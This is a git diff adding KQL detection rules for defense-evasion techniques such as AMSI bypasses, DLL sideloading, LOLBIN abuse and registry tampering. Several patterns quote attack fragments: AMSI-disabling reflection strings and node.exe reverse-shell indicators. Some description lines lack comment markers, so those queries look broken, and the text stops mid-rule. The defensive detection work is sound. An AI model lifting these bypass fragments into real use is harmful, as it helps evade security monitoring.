a/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql b/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql new file mode 100644 index 00000000..268f65c5 --- /dev/null +++ b/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql @@ -0,0 +1,10 @@ +// Title: OpenWith.exe Executes Specified Binary +// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea) +// Date: 2019-10-12 +// Level: high +// Description: The OpenWith.exe executes other binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ProcessCommandLine contains "/c" and FolderPath endswith "\\OpenWith.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql new file mode 100644 index 00000000..fa41dd99 --- /dev/null +++ b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql @@ -0,0 +1,12 @@ +// Title: Outbound Network Connection Initiated By Cmstp.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-30 +// Level: high +// Description: Detects a network connection initiated by Cmstp.EXE +Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.003 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\cmstp.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql b/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql new file mode 100644 index 00000000..7a45bdbf --- /dev/null +++ b/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql @@ -0,0 +1,12 @@ +// Title: Outbound Network Connection To Public IP Via Winlogon +// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io +// Date: 2023-04-28 +// Level: medium +// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011 +// False Positives: +// - Communication to other corporate systems that use IP addresses from public address spaces + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql b/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql new file mode 100644 index 00000000..f4897dc8 --- /dev/null +++ b/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql @@ -0,0 +1,12 @@ +// Title: Outgoing Logon with New Credentials +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-04-06 +// Level: low +// Description: Detects logon events that specify new credentials +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1550 +// False Positives: +// - Legitimate remote administration activity + +DeviceLogonEvents +| where LogonType == 9 \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql b/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql new file mode 100644 index 00000000..0781adc6 --- /dev/null +++ b/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql @@ -0,0 +1,10 @@ +// Title: Password Provided In Command Line Of Net.EXE +// Author: Tim Shelton (HAWK.IO) +// Date: 2021-12-09 +// Level: medium +// Description: Detects a when net.exe is called with a password in the command line +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.initial-access, attack.persistence, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1078 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " ")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql new file mode 100644 index 00000000..4ff2d80e --- /dev/null +++ b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql @@ -0,0 +1,14 @@ +// Title: PDF File Created By RegEdit.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-08 +// Level: high +// Description: Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. +This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\regedit.exe" and FolderPath endswith ".pdf" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/ping_hex_ip.kql b/KQL/rules/Defense Evasion/ping_hex_ip.kql new file mode 100644 index 00000000..3d380ea3 --- /dev/null +++ b/KQL/rules/Defense Evasion/ping_hex_ip.kql @@ -0,0 +1,12 @@ +// Title: Ping Hex IP +// Author: Florian Roth (Nextron Systems) +// Date: 2018-03-23 +// Level: high +// Description: Detects a ping command that uses a hex encoded IP address +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, attack.t1027 +// False Positives: +// - Unlikely, because no sane admin pings IP addresses in a hexadecimal form + +DeviceProcessEvents +| where ProcessCommandLine matches regex "0x[a-fA-F0-9]{8}" and FolderPath endswith "\\ping.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql new file mode 100644 index 00000000..a7595a4a --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential 7za.DLL Sideloading +// Author: X__Junior +// Date: 2023-06-09 +// Level: low +// Description: Detects potential DLL sideloading of "7za.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed. + +DeviceImageLoadEvents +| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql b/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql new file mode 100644 index 00000000..8b98624d --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql @@ -0,0 +1,12 @@ +// Title: Potential Adplus.EXE Abuse +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-09 +// Level: high +// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.credential-access, attack.t1003.001 +// False Positives: +// - Legitimate usage of Adplus for debugging purposes + +DeviceProcessEvents +| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql b/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql new file mode 100644 index 00000000..c052d00a --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql @@ -0,0 +1,10 @@ +// Title: Potential AMSI Bypass Using NULL Bits +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-04 +// Level: medium +// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "if(0){{{0}}}' -f $(0 -as [char]) +" or ProcessCommandLine contains "#" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql b/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql new file mode 100644 index 00000000..6defa1db --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql @@ -0,0 +1,12 @@ +// Title: Potential AMSI Bypass Via .NET Reflection +// Author: Markus Neis, @Kostastsale +// Date: 2018-08-17 +// Level: high +// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "System.Management.Automation.AmsiUtils" and ProcessCommandLine contains "amsiInitFailed") or (ProcessCommandLine contains "[Ref].Assembly.GetType" and ProcessCommandLine contains "SetValue($null,$true)" and ProcessCommandLine contains "NonPublic,Static") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql b/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql new file mode 100644 index 00000000..ce646212 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql @@ -0,0 +1,10 @@ +// Title: Potential AMSI COM Server Hijacking +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-04 +// Level: high +// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)" and (not(RegistryValueData =~ "%windir%\\system32\\amsi.dll")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql new file mode 100644 index 00000000..547d4adf --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql @@ -0,0 +1,14 @@ +// Title: Potential Antivirus Software DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-08-17 +// Level: medium +// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. +// - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. +// - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file + +DeviceImageLoadEvents +| where (FolderPath endswith "\\log.dll" and (not(((FolderPath in~ ("C:\\Program Files\\AVAST Software\\Avast\\log.dll", "C:\\Program Files (x86)\\AVAST Software\\Avast\\log.dll")) or (FolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\log.dll", "C:\\Program Files (x86)\\AVG\\Antivirus\\log.dll")) or (FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not(((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\") or (FolderPath startswith "C:\\Program Files\\AVG\\Antivirus\\" or FolderPath startswith "C:\\Program Files (x86)\\AVG\\Antivirus\\"))))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql new file mode 100644 index 00000000..92cd9f87 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql @@ -0,0 +1,14 @@ +// Title: Potential Application Whitelisting Bypass via Dnx.EXE +// Author: Beyu Denis, oscd.community +// Date: 2019-10-26 +// Level: medium +// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. +Attackers might abuse this in order to bypass application whitelisting. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.t1027.004 +// False Positives: +// - Legitimate use of dnx.exe by legitimate user + +DeviceProcessEvents +| where FolderPath endswith "\\dnx.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql b/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql new file mode 100644 index 00000000..e8a90e17 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Arbitrary Code Execution Via Node.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --eval ") and FolderPath endswith "\\node.exe") and (ProcessCommandLine contains ".exec(" and ProcessCommandLine contains "net.socket" and ProcessCommandLine contains ".connect" and ProcessCommandLine contains "child_process") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql b/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql new file mode 100644 index 00000000..b3971eb4 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential Arbitrary Command Execution Using Msdt.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-29 +// Level: high +// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (ProcessCommandLine contains "IT_BrowseForFile=" or (ProcessCommandLine contains " PCWDiagnostic" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af "))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql b/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql new file mode 100644 index 00000000..3839334e --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql @@ -0,0 +1,10 @@ +// Title: Potential Arbitrary DLL Load Using Winword +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/l " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\WINWORD.exe" or ProcessVersionInfoOriginalFileName =~ "WinWord.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql b/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql new file mode 100644 index 00000000..391e2400 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql @@ -0,0 +1,10 @@ +// Title: Potential Arbitrary File Download Using Office Application +// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community +// Date: 2022-05-17 +// Level: high +// Description: Detects potential arbitrary file download using a Microsoft Office application +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and ((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql new file mode 100644 index 00000000..8c9a2ba9 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql @@ -0,0 +1,12 @@ +// Title: Potential Attachment Manager Settings Associations Tamper +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: high +// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations*" and ((RegistryValueData =~ "DWORD (0x00006152)" and RegistryKey endswith "\\DefaultFileTypeRisk") or ((RegistryValueData contains ".zip;" or RegistryValueData contains ".rar;" or RegistryValueData contains ".exe;" or RegistryValueData contains ".bat;" or RegistryValueData contains ".com;" or RegistryValueData contains ".cmd;" or RegistryValueData contains ".reg;" or RegistryValueData contains ".msi;" or RegistryValueData contains ".htm;" or RegistryValueData contains ".html;") and RegistryKey endswith "\\LowRiskFileTypes")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql new file mode 100644 index 00000000..cfa6d3e8 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql @@ -0,0 +1,12 @@ +// Title: Potential Attachment Manager Settings Attachments Tamper +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: high +// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\HideZoneInfoOnProperties") or (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SaveZoneInformation") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\ScanWithAntiVirus")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql b/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql new file mode 100644 index 00000000..370a54d4 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql @@ -0,0 +1,10 @@ +// Title: Potential AutoLogger Sessions Tampering +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: high +// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents +| where (RegistryKey endswith "\\System\\CurrentControlSet\\Control\\WMI\\Autologger*" and (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\EventLog-" or RegistryKey contains "\\Defender") and (RegistryKey endswith "\\Enable" or RegistryKey endswith "\\Start"))) and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\") and (RegistryKey endswith "\\DefenderApiLogger*" or RegistryKey endswith "\\DefenderAuditLogger*")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql new file mode 100644 index 00000000..a4d4f029 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql @@ -0,0 +1,11 @@ +// Title: Potential Base64 Decoded From Images +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-12-20 +// Level: high +// Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140 + +DeviceProcessEvents +| where (ProcessCommandLine contains "base64" and ProcessCommandLine contains "-d" and ProcessCommandLine contains ">") and (ProcessCommandLine contains ".avif" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jfif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".pjp" or ProcessCommandLine contains ".pjpeg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".svg" or ProcessCommandLine contains ".webp") and FolderPath endswith "/bash" and (ProcessCommandLine contains "tail" and ProcessCommandLine contains "-c") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql b/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql new file mode 100644 index 00000000..9357a925 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Binary Proxy Execution Via VSDiagnostics.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-03 +// Level: medium +// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage for tracing and diagnostics purposes + +DeviceProcessEvents +| where (ProcessCommandLine contains " /launch:" or ProcessCommandLine contains " -launch:") and ProcessCommandLine contains "start" and (FolderPath endswith "\\VSDiagnostics.exe" or ProcessVersionInfoOriginalFileName =~ "VSDiagnostics.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql new file mode 100644 index 00000000..e87c0fb8 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential CCleanerDU.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-13 +// Level: medium +// Description: Detects potential DLL sideloading of "CCleanerDU.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives could occur from other custom installation paths. Apply additional filters accordingly. + +DeviceImageLoadEvents +| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql new file mode 100644 index 00000000..c64e73bf --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential CCleanerReactivator.DLL Sideloading +// Author: X__Junior +// Date: 2023-07-13 +// Level: medium +// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives could occur from other custom installation paths. Apply additional filters accordingly. + +DeviceImageLoadEvents +| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql new file mode 100644 index 00000000..6b0ed7b2 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql @@ -0,0 +1,10 @@ +// Title: Potential Chrome Frame Helper DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-08-17 +// Level: medium +// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql b/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql new file mode 100644 index 00000000..46ae6352 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql @@ -0,0 +1,13 @@ +// Title: Potential Command Line Path Traversal Evasion Attempt +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-10-26 +// Level: medium +// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 +// False Positives: +// - Google Drive +// - Citrix + +DeviceProcessEvents +| where (((ProcessCommandLine contains "\\..\\Windows\\" or ProcessCommandLine contains "\\..\\System32\\" or ProcessCommandLine contains "\\..\\..\\") and FolderPath contains "\\Windows\\") or ProcessCommandLine contains ".exe\\..\\") and (not((ProcessCommandLine contains "\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\" or ProcessCommandLine contains 